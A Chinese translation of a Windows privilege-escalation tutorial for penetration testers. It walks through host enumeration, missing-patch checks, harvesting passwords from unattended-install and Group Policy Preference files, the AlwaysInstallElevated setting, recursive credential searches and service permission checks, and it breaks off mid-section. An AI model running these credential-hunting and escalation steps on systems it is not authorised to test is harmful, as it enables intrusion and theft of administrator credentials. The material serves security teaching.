本文将深入探讨一个典型的 Windows 系统权限提升过程,并介绍在此过程中可能涉及的各种技术和步骤。从最初的信息收集和环境侦察开始,到利用 Windows 服务、计划任务和文件/文件夹权限漏洞,我们将逐步展示如何在渗透测试中执行权限提升攻击。
目录:
-
t1 到 t3 涉及初步的信息收集和基本的环境侦察。
-
t4 专注于使用 WMIC 工具进行深入的信息收集。
-
t5 到 t6 涉及快速查找明显的补丁安全漏洞。
-
t7 到 t10 涉及更复杂的操作,t7 阶段的重点在于利用 Windows 服务配置和权限漏洞进行权限提升
正文:
很少有人讨论严重的 Windows 权限提升问题,这真是遗憾。我认为原因可能是:
(1) 在渗透测试任务中,低权限的 shell 通常已经足够向客户证明存在漏洞。
(2) 在分阶段环境中,你经常会直接获取管理员账号。
(3) 使用 meterpreter 工具会让渗透测试人员变得懒惰。具体来说,meterpreter 有一个名为 `getsystem` 的命令,可以自动尝试提升权限到 SYSTEM 级别。由于这个命令非常简单和方便,渗透测试人员可能会依赖它,而不去深入了解或手动进行权限提升的过程。因此,`getsystem = 懒惰功夫` 表示使用 `getsystem` 命令会让人变得懒惰,不再花心思研究更复杂的权限提升方法。
(4) 构建审查通常最终变成了认证的 Nessus 扫描和 Microsoft 安全基线分析器...
与普遍的看法相反,如果 Windows 系统配置得当,可以非常安全。此外,打补丁的时间窗口很短。所以让我们深入挖掘 Windows 操作系统的黑暗角落,看看是否能获取 SYSTEM 权限。
需要注意的是,我将使用各种版本的 Windows 来展示可能存在的命令行差异。请记住,由于操作系统/服务包的不同,某些命令可能不存在或产生略有不同的输出。我试图将本教程结构化,以便它能在最普遍的情况下适用于 Windows 权限提升。
从 t0 到 t3 的阶段 - 初步信息收集
本教程的起点是获得目标机器上的一个低权限 shell。我们可能使用了远程漏洞利用或客户端攻击,从而获取了一个 shell。基本上,在 t0 时刻,我们对机器没有任何了解,不知道它的用途、连接情况、权限级别,甚至不知道它运行的是什么操作系统。
首先,我们需要迅速收集一些基本信息,以便了解当前的环境并评估我们的情况。
首先,让我们找出我们连接的操作系统:
C:Windowssystem32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"OS Name: Microsoft Windows 7 ProfessionalOS Version: 6.1.7601 Service Pack 1 Build 7601
接下来,我们将查看该机器的主机名以及我们当前连接的用户。
C:Windowssystem32> hostnameb33fC:Windowssystem32> echo %username%user1
现在我们有了这些基本信息,我们在框中列出了其他用户帐户,并更详细地查看我们自己的用户信息。我们已经可以看到 user1 不属于本地组管理员。
C:Windowssystem32> net usersUser accounts for \B33F-------------------------------------------------------------------------------Administrator b33f Guestuser1The command completed successfully.C:Windowssystem32> net user user1User name user1Full NameCommentUser's commentCountry code 000 (System Default)Account active YesAccount expires NeverPassword last set 1/11/2014 7:47:14 PMPassword expires NeverPassword changeable 1/11/2014 7:47:14 PMPassword required YesUser may change password YesWorkstations allowed AllLogon scriptUser profileHome directoryLast logon 1/11/2014 8:05:09 PMLogon hours allowed AllLocal Group Memberships *UsersGlobal Group memberships *NoneThe command completed successfully.
这就是我们目前需要了解的有关用户和权限的全部信息。我们列表中的下一个是网络,机器连接到什么以及它对这些连接施加什么规则。
首先让我们看一下可用的网络接口和路由表。
C:Windowssystem32> ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : b33fPrimary Dns Suffix . . . . . . . :Node Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoEthernet adapter Bluetooth Network Connection:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . :Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)Physical Address. . . . . . . . . : 0C-84-DC-62-60-29DHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesEthernet adapter Local Area Connection:Connection-specific DNS Suffix . :Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network ConnectionPhysical Address. . . . . . . . . : 00-0C-29-56-79-35DHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::5cd4:9caf:61c0:ba6e%11(Preferred)IPv4 Address. . . . . . . . . . . : 192.168.0.104(Preferred)Subnet Mask . . . . . . . . . . . : 255.255.255.0Lease Obtained. . . . . . . . . . : Saturday, January 11, 2014 3:53:55 PMLease Expires . . . . . . . . . . : Sunday, January 12, 2014 3:53:55 PMDefault Gateway . . . . . . . . . : 192.168.0.1DHCP Server . . . . . . . . . . . : 192.168.0.1DHCPv6 IAID . . . . . . . . . . . : 234884137DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-18-14-24-1D-00-0C-29-56-79-35DNS Servers . . . . . . . . . . . : 192.168.0.1NetBIOS over Tcpip. . . . . . . . : EnabledC:Windowssystem32> route print===========================================================================Interface List18...0c 84 dc 62 60 29 ......Bluetooth Device (Personal Area Network)13...00 ff 0c 0d 4f ed ......TAP-Windows Adapter V911...00 0c 29 56 79 35 ......Intel(R) PRO/1000 MT Network Connection1...........................Software Loopback Interface 116...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #219...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #314...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface===========================================================================IPv4 Route Table===========================================================================Active Routes:Network Destination Netmask Gateway Interface Metric0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.104 10127.0.0.0 255.0.0.0 On-link 127.0.0.1 306127.0.0.1 255.255.255.255 On-link 127.0.0.1 306127.255.255.255 255.255.255.255 On-link 127.0.0.1 306192.168.0.0 255.255.255.0 On-link 192.168.0.104 266192.168.0.104 255.255.255.255 On-link 192.168.0.104 266192.168.0.255 255.255.255.255 On-link 192.168.0.104 266224.0.0.0 240.0.0.0 On-link 127.0.0.1 306224.0.0.0 240.0.0.0 On-link 192.168.0.104 266255.255.255.255 255.255.255.255 On-link 127.0.0.1 306255.255.255.255 255.255.255.255 On-link 192.168.0.104 266===========================================================================Persistent Routes:NoneIPv6 Route Table===========================================================================Active Routes:If Metric Network Destination Gateway14 58 ::/0 On-link1 306 ::1/128 On-link14 58 2001::/32 On-link14 306 2001:0:5ef5:79fb:8d2:b4e:3f57:ff97/128On-link11 266 fe80::/64 On-link14 306 fe80::/64 On-link14 306 fe80::8d2:b4e:3f57:ff97/128On-link11 266 fe80::5cd4:9caf:61c0:ba6e/128On-link1 306 ff00::/8 On-link14 306 ff00::/8 On-link11 266 ff00::/8 On-link===========================================================================Persistent Routes:None# arp -A displays the ARP (Address Resolution Protocol) cache table for all available interfaces.C:Windowssystem32> arp -AInterface: 192.168.0.104 --- 0xbInternet Address Physical Address Type192.168.0.1 90-94-e4-c5-b0-46 dynamic192.168.0.101 ac-22-0b-af-bb-43 dynamic192.168.0.255 ff-ff-ff-ff-ff-ff static224.0.0.22 01-00-5e-00-00-16 static224.0.0.251 01-00-5e-00-00-fb static224.0.0.252 01-00-5e-00-00-fc static239.255.255.250 01-00-5e-7f-ff-fa static255.255.255.255 ff-ff-ff-ff-ff-ff static
接下来,我们将查看当前的网络连接和防火墙规则。
C:Windowssystem32> netstat -anoActive ConnectionsProto Local Address Foreign Address State PIDTCP 0.0.0.0:135 0.0.0.0:0 LISTENING 684TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4TCP 127.0.0.1:5354 0.0.0.0:0 LISTENING 1400TCP 192.168.0.104:139 0.0.0.0:0 LISTENING 4TCP [::]:135 [::]:0 LISTENING 684TCP [::]:445 [::]:0 LISTENING 4TCP [::]:5357 [::]:0 LISTENING 4UDP 0.0.0.0:5355 *:* 1100UDP 0.0.0.0:52282 *:* 976UDP 0.0.0.0:55202 *:* 2956UDP 0.0.0.0:59797 *:* 1400UDP 127.0.0.1:1900 *:* 2956UDP 127.0.0.1:65435 *:* 2956UDP 192.168.0.104:137 *:* 4UDP 192.168.0.104:138 *:* 4UDP 192.168.0.104:1900 *:* 2956UDP 192.168.0.104:5353 *:* 1400UDP 192.168.0.104:65434 *:* 2956UDP [::]:5355 *:* 1100UDP [::]:52281 *:* 976UDP [::]:52283 *:* 976UDP [::]:55203 *:* 2956UDP [::]:59798 *:* 1400UDP [::1]:1900 *:* 2956UDP [::1]:5353 *:* 1400UDP [::1]:65433 *:* 2956UDP [fe80::5cd4:9caf:61c0:ba6e%11]:1900 *:* 2956UDP [fe80::5cd4:9caf:61c0:ba6e%11]:65432 *:* 2956# The following two netsh commands are examples of commands that are not universal across OS/SP. The netshfirewall commands are only available from XP SP2 and upwards.C:Windowssystem32> netsh firewall show stateFirewall status:-------------------------------------------------------------------Profile = StandardOperational mode = EnableException mode = EnableMulticast/broadcast response mode = EnableNotification mode = EnableGroup policy version = Windows FirewallRemote admin mode = DisablePorts currently open on all network interfaces:Port Protocol Version Program-------------------------------------------------------------------No ports are currently open on all network interfaces.C:Windowssystem32> netsh firewall show configDomain profile configuration:-------------------------------------------------------------------Operational mode = EnableException mode = EnableMulticast/broadcast response mode = EnableNotification mode = EnableAllowed programs configuration for Domain profile:Mode Traffic direction Name / Program-------------------------------------------------------------------Port configuration for Domain profile:Port Protocol Mode Traffic direction Name-------------------------------------------------------------------ICMP configuration for Domain profile:Mode Type Description-------------------------------------------------------------------Enable 2 Allow outbound packet too bigStandard profile configuration (current):-------------------------------------------------------------------Operational mode = EnableException mode = EnableMulticast/broadcast response mode = EnableNotification mode = EnableService configuration for Standard profile:Mode Customized Name-------------------------------------------------------------------Enable No Network DiscoveryAllowed programs configuration for Standard profile:Mode Traffic direction Name / Program-------------------------------------------------------------------Enable Inbound COMRaider / E:comraidercomraider.exeEnable Inbound nc.exe / C:usersb33fdesktopnc.exePort configuration for Standard profile:Port Protocol Mode Traffic direction Name-------------------------------------------------------------------ICMP configuration for Standard profile:Mode Type Description-------------------------------------------------------------------Enable 2 Allow outbound packet too bigLog configuration:-------------------------------------------------------------------File location = C:Windowssystem32LogFilesFirewallpfirewall.logMax file size = 4096 KBDropped packets = DisableConnections = Disable
最后,我们将简要查看被攻陷机器上运行的内容:计划任务、运行中的进程、已启动的服务和已安装的驱动程序。
# This will display verbose output for all scheduled tasks, below you can see sample output for asingle task.C:Windowssystem32> schtasks /query /fo LIST /vFolder: MicrosoftWindows DefenderHostName: B33FTaskName: MicrosoftWindows DefenderMP Scheduled ScanNext Run Time: 1/22/2014 5:11:13 AMStatus: ReadyLogon Mode: Interactive/BackgroundLast Run Time: N/ALast Result: 1Author: N/ATask To Run: c:program fileswindows defenderMpCmdRun.exe Scan -ScheduleJob-WinTask -RestrictPrivilegesScanStart In: N/AComment: Scheduled ScanScheduled Task State: EnabledIdle Time: Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutesPower Management: No Start On BatteriesRun As User: SYSTEMDelete Task If Not Rescheduled: EnabledStop Task If Runs X Hours and X Mins: 72:00:00Schedule: Scheduling data is not available in this format.Schedule Type: DailyStart Time: 5:11:13 AMStart Date: 1/1/2000End Date: 1/1/2100Days: Every 1 day(s)Months: N/ARepeat: Every: DisabledRepeat: Until: Time: DisabledRepeat: Until: Duration: DisabledRepeat: Stop If Still Running: Disabled[..Snip..]# The following command links running processes to started services.C:Windowssystem32> tasklist /SVCImage Name PID Services========================= ======== ============================================System Idle Process 0 N/ASystem 4 N/Asmss.exe 244 N/Acsrss.exe 332 N/Acsrss.exe 372 N/Awininit.exe 380 N/Awinlogon.exe 428 N/Aservices.exe 476 N/Alsass.exe 484 SamSslsm.exe 496 N/Asvchost.exe 588 DcomLaunch, PlugPlay, Powersvchost.exe 668 RpcEptMapper, RpcSssvchost.exe 760 Audiosrv, Dhcp, eventlog,HomeGroupProvider, lmhosts, wscsvcsvchost.exe 800 AudioEndpointBuilder, CscService, Netman,SysMain, TrkWks, UxSms, WdiSystemHost,wudfsvcsvchost.exe 836 AeLookupSvc, BITS, gpsvc, iphlpsvc,LanmanServer, MMCSS, ProfSvc, Schedule,seclogon, SENS, ShellHWDetection, Themes,Winmgmt, wuauservaudiodg.exe 916 N/Asvchost.exe 992 EventSystem, fdPHost, netprofm, nsi,WdiServiceHost, WinHttpAutoProxySvcsvchost.exe 1104 CryptSvc, Dnscache, LanmanWorkstation,NlaSvcspoolsv.exe 1244 Spoolersvchost.exe 1272 BFE, DPS, MpsSvcmDNSResponder.exe 1400 Bonjour Servicetaskhost.exe 1504 N/Ataskeng.exe 1556 N/Avmtoolsd.exe 1580 VMToolsdwm.exe 1660 N/Aexplorer.exe 1668 N/Avmware-usbarbitrator.exe 1768 VMUSBArbServiceTPAutoConnSvc.exe 1712 TPAutoConnSvc[..Snip..]C:Windowssystem32> net startThese Windows services are started:Application ExperienceApplication InformationBackground Intelligent Transfer ServiceBase Filtering EngineBluetooth Support ServiceBonjour ServiceCOM+ Event SystemCOM+ System ApplicationCryptographic ServicesDCOM Server Process LauncherDesktop Window Manager Session ManagerDHCP ClientDiagnostic Policy ServiceDiagnostic Service HostDiagnostic System HostDistributed Link Tracking ClientDistributed Transaction CoordinatorDNS ClientFunction Discovery Provider HostFunction Discovery Resource PublicationGroup Policy Client[..Snip..]# This can be useful sometimes as some 3rd party drivers, even by reputable companies, contain more holesthan Swiss cheese. This is only possible because ring0 exploitation lies outside most peoples expertise.C:Windowssystem32> DRIVERQUERYModule Name Display Name Driver Type Link Date============ ====================== ============= ======================1394ohci 1394 OHCI Compliant Ho Kernel 11/20/2010 6:01:11 PMACPI Microsoft ACPI Driver Kernel 11/20/2010 4:37:52 PMAcpiPmi ACPI Power Meter Drive Kernel 11/20/2010 4:47:55 PMadp94xx adp94xx Kernel 12/6/2008 7:59:55 AMadpahci adpahci Kernel 5/2/2007 1:29:26 AMadpu320 adpu320 Kernel 2/28/2007 8:03:08 AMAFD Ancillary Function Dri Kernel 11/20/2010 4:40:00 PMagp440 Intel AGP Bus Filter Kernel 7/14/2009 7:25:36 AMaic78xx aic78xx Kernel 4/12/2006 8:20:11 AMaliide aliide Kernel 7/14/2009 7:11:17 AMamdagp AMD AGP Bus Filter Dri Kernel 7/14/2009 7:25:36 AMamdide amdide Kernel 7/14/2009 7:11:19 AMAmdK8 AMD K8 Processor Drive Kernel 7/14/2009 7:11:03 AMAmdPPM AMD Processor Driver Kernel 7/14/2009 7:11:03 AMamdsata amdsata Kernel 3/19/2010 9:08:27 AMamdsbs amdsbs Kernel 3/21/2009 2:35:26 AMamdxata amdxata Kernel 3/20/2010 12:19:01 AMAppID AppID Driver Kernel 11/20/2010 5:29:48 PMarc arc Kernel 5/25/2007 5:31:06 AM[..Snip..]
从 t4阶段开始 - WMIC 的奥秘
我想单独提一下 WMIC(Windows Management Instrumentation Command-Line),因为它是 Windows 最有用的命令行工具。WMIC 在信息收集和后期利用中非常实用。不过,它的操作有点笨拙,输出结果也不尽如人意。
全面解释 WMIC 的使用方法需要一整篇教程。更不用说,由于格式问题,有些输出结果很难展示。
以下列出了两个值得阅读的资源:
Command-Line Ninjitsu (SynJunkie) - [here](https://synjunkie.blogspot.com/2008/09/command-line-ninjitsu-4-wmic.html)Windows WMIC Command Line (ComputerHope) - [here](https://www.computerhope.com/wmic.htm)
不幸的是,一些默认配置的 Windows 不允许访问 WMIC,除非用户在 Administrators 组中(这可能是一个很好的安全措施)。根据我在虚拟机上的测试,我注意到任何版本的 XP 都不允许低权限账户访问 WMIC。相反,默认安装的 Windows 7 Professional 和 Windows 8 Enterprise 允许低权限用户使用 WMIC 并查询操作系统,而无需修改任何设置。这正是我们需要的,因为我们使用 WMIC 来收集目标机器的信息。
为了让你了解 WMIC 的广泛选项,我列出了可用的命令行开关。
C:Windowssystem32> wmic /?[global switches]The following global switches are available:/NAMESPACE Path for the namespace the alias operate against./ROLE Path for the role containing the alias definitions./NODE Servers the alias will operate against./IMPLEVEL Client impersonation level./AUTHLEVEL Client authentication level./LOCALE Language id the client should use./PRIVILEGES Enable or disable all privileges./TRACE Outputs debugging information to stderr./RECORD Logs all input commands and output./INTERACTIVE Sets or resets the interactive mode./FAILFAST Sets or resets the FailFast mode./USER User to be used during the session./PASSWORD Password to be used for session login./OUTPUT Specifies the mode for output redirection./APPEND Specifies the mode for output redirection./AGGREGATE Sets or resets aggregate mode./AUTHORITY Specifies the for the connection./?[:<BRIEF|FULL>] Usage information.For more information on a specific global switch, type: switch-name /?The following alias/es are available in the current role:ALIAS - Access to the aliases available on the local systemBASEBOARD - Base board (also known as a motherboard or system board) management.BIOS - Basic input/output services (BIOS) management.BOOTCONFIG - Boot configuration management.CDROM - CD-ROM management.COMPUTERSYSTEM - Computer system management.CPU - CPU management.CSPRODUCT - Computer system product information from SMBIOS.DATAFILE - DataFile Management.DCOMAPP - DCOM Application management.DESKTOP - User's Desktop management.DESKTOPMONITOR - Desktop Monitor management.DEVICEMEMORYADDRESS - Device memory addresses management.DISKDRIVE - Physical disk drive management.DISKQUOTA - Disk space usage for NTFS volumes.DMACHANNEL - Direct memory access (DMA) channel management.ENVIRONMENT - System environment settings management.FSDIR - Filesystem directory entry management.GROUP - Group account management.IDECONTROLLER - IDE Controller management.IRQ - Interrupt request line (IRQ) management.JOB - Provides access to the jobs scheduled using the schedule service.LOADORDER - Management of system services that define execution dependencies.LOGICALDISK - Local storage device management.LOGON - LOGON Sessions.MEMCACHE - Cache memory management.MEMORYCHIP - Memory chip information.MEMPHYSICAL - Computer system's physical memory management.NETCLIENT - Network Client management.NETLOGIN - Network login information (of a particular user) management.NETPROTOCOL - Protocols (and their network characteristics) management.NETUSE - Active network connection management.NIC - Network Interface Controller (NIC) management.NICCONFIG - Network adapter management.NTDOMAIN - NT Domain management.NTEVENT - Entries in the NT Event Log.NTEVENTLOG - NT eventlog file management.ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).OS - Installed Operating System/s management.PAGEFILE - Virtual memory file swapping management.PAGEFILESET - Page file settings management.PARTITION - Management of partitioned areas of a physical disk.PORT - I/O port management.PORTCONNECTOR - Physical connection ports management.PRINTER - Printer device management.PRINTERCONFIG - Printer device configuration management.PRINTJOB - Print job management.PROCESS - Process management.PRODUCT - Installation package task management.QFE - Quick Fix Engineering.QUOTASETTING - Setting information for disk quotas on a volume.RDACCOUNT - Remote Desktop connection permission management.RDNIC - Remote Desktop connection management on a specific network adapter.RDPERMISSIONS - Permissions to a specific Remote Desktop connection.RDTOGGLE - Turning Remote Desktop listener on or off remotely.RECOVEROS - Information that will be gathered from memory when the operating system fails.REGISTRY - Computer system registry management.SCSICONTROLLER - SCSI Controller management.SERVER - Server information management.SERVICE - Service application management.SHADOWCOPY - Shadow copy management.SHADOWSTORAGE - Shadow copy storage area management.SHARE - Shared resource management.SOFTWAREELEMENT - Management of the elements of a software product installed on a system.SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.SOUNDDEV - Sound Device management.STARTUP - Management of commands that run automatically when users log onto the computersystem.SYSACCOUNT - System account management.SYSDRIVER - Management of the system driver for a base service.SYSTEMENCLOSURE - Physical system enclosure management.SYSTEMSLOT - Management of physical connection points including ports, slots andperipherals, and proprietary connections points.TAPEDRIVE - Tape drive management.TEMPERATURE - Data management of a temperature sensor (electronic thermometer).TIMEZONE - Time zone data management.UPS - Uninterruptible power supply (UPS) management.USERACCOUNT - User account management.VOLTAGE - Voltage sensor (electronic voltmeter) data management.VOLUME - Local storage volume management.VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.VOLUMEUSERQUOTA - Per user storage volume quota management.WMISET - WMI service operational parameters management.For more information on a specific alias, type: alias /?CLASS - Escapes to full WMI schema.PATH - Escapes to full WMI object paths.CONTEXT - Displays the state of all the global switches.QUIT/EXIT - Exits the program.For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?
简化起见,我创建了一个脚本,可以放置在目标机器上,并使用 WMIC 提取以下信息:进程、服务、用户账户、用户组、网络接口、硬盘信息、网络共享信息、安装的 Windows 补丁、启动时运行的程序、已安装软件列表、操作系统信息和时区信息。
我已经查看了各种标志和参数,以提取有价值的信息片段。如果有人认为应该添加到列表中的内容,请在下面留下评论。使用内置的输出功能,脚本将所有结果写入一个易于阅读的 HTML 文件。
你可以在这里下载我的脚本(wmic_info.bat)- [这里](https://example.com/wmic_info.bat)在一个 Windows 7 VM(补丁打得很差)上的示例输出文件- [这里](https://example.com/sample_output.html)
从 t5 到 t6 阶段 - 补丁漏洞
在继续之前,你应该花点时间回顾一下你迄今为止收集的信息,因为现在应该已经有相当多的信息了。我们游戏计划的下一步是寻找一些可以快速利用的补丁漏洞,以升级我们的用户权限。
我们首先需要查看的是补丁级别,这是最显而易见的。如果我们发现主机补丁打得很差,就没有必要继续担心了。我的 WMIC 脚本已经列出了所有安装的补丁,但你可以查看下面的示例命令行输出。
C:Windowssystem32> wmic qfe get Caption,Description,HotFixID,InstalledOnCaption Description HotFixID InstalledOnhttp://support.microsoft.com/?kbid=2727528 Security Update KB2727528 11/23/2013http://support.microsoft.com/?kbid=2729462 Security Update KB2729462 11/26/2013http://support.microsoft.com/?kbid=2736693 Security Update KB2736693 11/26/2013http://support.microsoft.com/?kbid=2737084 Security Update KB2737084 11/23/2013http://support.microsoft.com/?kbid=2742614 Security Update KB2742614 11/23/2013http://support.microsoft.com/?kbid=2742616 Security Update KB2742616 11/26/2013http://support.microsoft.com/?kbid=2750149 Update KB2750149 11/23/2013http://support.microsoft.com/?kbid=2756872 Update KB2756872 11/24/2013http://support.microsoft.com/?kbid=2756923 Security Update KB2756923 11/26/2013http://support.microsoft.com/?kbid=2757638 Security Update KB2757638 11/23/2013http://support.microsoft.com/?kbid=2758246 Update KB2758246 11/24/2013http://support.microsoft.com/?kbid=2761094 Update KB2761094 11/24/2013http://support.microsoft.com/?kbid=2764870 Update KB2764870 11/24/2013http://support.microsoft.com/?kbid=2768703 Update KB2768703 11/23/2013http://support.microsoft.com/?kbid=2769034 Update KB2769034 11/23/2013http://support.microsoft.com/?kbid=2769165 Update KB2769165 11/23/2013http://support.microsoft.com/?kbid=2769166 Update KB2769166 11/26/2013http://support.microsoft.com/?kbid=2770660 Security Update KB2770660 11/23/2013http://support.microsoft.com/?kbid=2770917 Update KB2770917 11/24/2013http://support.microsoft.com/?kbid=2771821 Update KB2771821 11/24/2013[..Snip..]
像往常一样,对于 Windows,输出并不是完全准备好使用的。最好的策略是查找权限提升漏洞并查找它们对应的 KB 补丁编号。这些漏洞包括但不限于 KiTrap0D(KB979682)、MS11-011(KB2393802)、MS10-059(KB982799)、MS10-021(KB979683)、MS11-080(KB2592799)。在枚举操作系统版本和服务包之后,你应该查找可能存在的权限提升漏洞。使用 KB 补丁编号,你可以 grep 安装的补丁,看看是否有任何补丁缺失。
你可以查看下面的命令来 grep 补丁:
C:Windowssystem32> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."接下来我们将看一下批量部署。如果有许多机器需要安装,通常情况下,技术人员不会一个个地去处理每台机器。有几种方法可以自动安装机器。这些方法的具体原理并不是我们关注的重点,但主要的是它们会留下用于安装过程的配置文件。这些配置文件包含许多敏感信息,如操作系统产品密钥和管理员密码。我们最感兴趣的是管理员密码,因为我们可以使用它来提升权限。
通常这些是包含配置文件的目录(不过最好检查整个操作系统):
c:sysprep.infc:sysprepsysprep.xml%WINDIR%PantherUnattendUnattended.xml%WINDIR%PantherUnattended.xml
这些文件要么包含明文密码,要么以 Base64 编码的格式存在。你可以在下面看到一些示例文件输出。
# This is a sample from sysprep.inf with clear-text credentials.[GuiUnattended]OEMSkipRegional=1OemSkipWelcome=1AdminPassword=s3cr3tp4ssw0rdTimeZone=20# This is a sample from sysprep.xml with Base64 "encoded" credentials. Please people Base64 is notencryption, I take more precautions to protect my coffee. The password here is "SuperSecurePassword".<LocalAccounts><LocalAccount wcm:action="add"><Password><Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value><PlainText>false</PlainText></Password><Description>Local Administrator</Description><DisplayName>Administrator</DisplayName><Group>Administrators</Group><Name>Administrator</Name></LocalAccount></LocalAccounts># Sample from Unattended.xml with the same "secure" Base64 encoding.<AutoLogon><Password><Value>U3VwZXJTZWN1cmVQYXNzd29yZA==</Value><PlainText>false</PlainText></Password><Enabled>true</Enabled><Username>Administrator</Username></AutoLogon>
根据 Ben Campbell(@Meatballs__)的建议,我将组策略首选项保存的密码添加到快速失败列表中。组策略首选项文件可用于在域机器上创建本地用户。当你攻陷的计算机连接到域时,非常值得查找存储在 SYSVOL 中的 Groups.xml 文件。任何经过身份验证的用户都将对此文件具有读取访问权限。XML 文件中的密码通过使用 AES 加密“隐藏”了,但我说“隐藏”是因为静态密钥已经发布在 MSDN 网站上,使得存储的值易于解密。
除了 Groups.xml 外,其他几个策略首选项文件也可以设置可选的 "cPassword" 属性:
ServicesServices.xml:特定元素属性ScheduledTasksScheduledTasks.xml:Task 内部元素、TaskV2 内部元素、ImmediateTaskV2 内部元素PrintersPrinters.xml:SharedPrinter 元素DrivesDrives.xml:特定元素属性DataSourcesDataSources.xml:特定元素属性
这个漏洞可以通过手动浏览 SYSVOL 并抓取相关文件来利用,如下所示。
然而,我们都喜欢自动化解决方案,这样我们就可以尽快完成任务。这里有两个主要选项,取决于我们拥有的 shell/access 类型。一种是(1)通过已建立的会话执行的 metasploit 模块,另一种是(2)使用 Get-GPPPassword,它是 PowerSploit 的一部分。PowerSploit 是由 Matt Graeber 创建的优秀的 PowerShell 框架,专门用于逆向工程、取证和渗透测试。
接下来,我们将寻找一个奇怪的注册表设置“AlwaysInstallElevated”,如果启用了此设置,则允许任何权限级别的用户将 *.msi 文件安装为 NT AUTHORITYSYSTEM。我觉得这个想法很奇怪,你会创建低权限用户(限制他们对操作系统的使用),但却给他们以 SYSTEM 身份安装程序的能力。关于此问题的更多背景信息,你可以阅读 GreyHatHacker 的 Parvez 在一篇文章中报告的安全问题。
为了能够使用这个功能,我们需要检查两个注册表键是否设置正确,如果是这样,我们就可以弹出一个 SYSTEM shell。你可以查看查询相应注册表键的语法如下。
# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.C:Windowssystem32> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevatedC:Windowssystem32> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated
为了完成本节,我们将在操作系统上进行一些快速搜索,希望我们能找到宝藏。你可以看到我们搜索的语法如下。
# The command below will search the file system for file names containing certain keywords. You canspecify as many keywords as you wish.C:Windowssystem32> dir /s *pass* == *cred* == *vnc* == *.config*# Search certain file types for a keyword, this can generate a lot of output.C:Windowssystem32> findstr /si password *.xml *.ini *.txt# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".C:Windowssystem32> reg query HKLM /f password /t REG_SZ /sC:Windowssystem32> reg query HKCU /f password /t REG_SZ /s
从 t7 到 t10阶段 - 深入利用
希望到目前为止,我们已经拥有了一个 SYSTEM shell,但如果没有,仍然有几个攻击途径可以尝试。在这最后一部分,我们将查看 Windows 服务和文件/文件夹权限。我们的目标是利用弱权限来提升我们的会话权限。
我们将检查许多访问权限,所以我们应该获取 accesschk.exe 的副本,这是 Microsoft 的 Sysinternals 套件中的一个工具。Microsoft Sysinternals 包含了许多优秀的工具,遗憾的是 Microsoft 没有将它们添加到标准的 Windows 构建中。你可以从 Microsoft 技术网站上下载这个套件。
我们将从 Windows 服务开始,因为那里有一些快速胜利可找到。一般现代操作系统不会包含易受攻击的服务。在这种情况下,“易受攻击”意味着我们可以重新配置服务参数。Windows 服务有点像应用程序快捷方式,看看下面的示例。
# We can use sc to query, configure and manage windows services.C:Windowssystem32> sc qc Spooler[SC] QueryServiceConfig SUCCESSSERVICE_NAME: SpoolerTYPE : 110 WIN32_OWN_PROCESS (interactive)START_TYPE : 2 AUTO_STARTERROR_CONTROL : 1 NORMALBINARY_PATH_NAME : C:WindowsSystem32spoolsv.exeLOAD_ORDER_GROUP : SpoolerGroupTAG : 0DISPLAY_NAME : Print SpoolerDEPENDENCIES : RPCSS: httpSERVICE_START_NAME : LocalSystem
# We can see the permissions that each user level has, you can also use "accesschk.exe -ucqv *" to listall services.C:> accesschk.exe -ucqv SpoolerSpoolerR NT AUTHORITYAuthenticated UsersSERVICE_QUERY_STATUSSERVICE_QUERY_CONFIGSERVICE_INTERROGATESERVICE_ENUMERATE_DEPENDENTSSERVICE_USER_DEFINED_CONTROLREAD_CONTROLR BUILTINPower UsersSERVICE_QUERY_STATUSSERVICE_QUERY_CONFIGSERVICE_INTERROGATESERVICE_ENUMERATE_DEPENDENTSSERVICE_STARTSERVICE_USER_DEFINED_CONTROLREAD_CONTROLRW BUILTINAdministratorsSERVICE_ALL_ACCESSRW NT AUTHORITYSYSTEMSERVICE_ALL_ACCESS
Accesschk 可以自动检查我们是否具有对特定用户级别的 Windows 服务的写访问权限。通常作为低权限用户,我们会希望检查 "Authenticated Users"。请确保检查您的用户属于哪些用户组,例如,“Power Users” 被认为是一个低权限用户组(尽管它并不常用)。
让我们比较一下在 Windows 8 和 Windows XP SP0 上的输出。
